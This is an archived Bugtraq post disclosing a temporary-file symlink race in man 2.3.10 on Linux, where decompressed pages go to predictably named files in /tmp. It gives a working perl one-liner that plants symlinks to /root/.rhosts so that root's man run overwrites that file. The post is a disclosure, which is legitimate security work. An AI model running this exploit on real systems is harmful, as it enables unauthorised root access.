Since this is my first posting to bugtraq, so please don't flame me if this is already known: I just noticed a problem with the man system (version 2.3.10) on my Linux box: /usr/man contains the .gz'd man pages: (from /usr/man/man1:) -rw-r--r-- 1 root root 1684 Sep 28 1995 cp.1.gz -rw-r--r-- 1 root root 4063 Dec 29 1995 cpio.1.gz -rw-r--r-- 1 root root 42 Oct 17 1996 cpp.1.gz When I execute man, a temporary file containing the un-zipped manpage is created in /tmp. The name of the tmp-file usually is "zman<PID>aaa", e.g. "zman10849aaa". This can be exploited with a simple symlink attack: perl -e 'for($i=8000;$i<12000;$i++){`ln -s /root/.rhosts /tmp/zman${i}aaa`;}' So when root executes man here and the pid of the man process falls in the range 8000-11999... you know the rest. -- regards, (o_ Thomas Fischbacher - tfat_private-muenchen.de //\ V_/_
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:37:26 PDT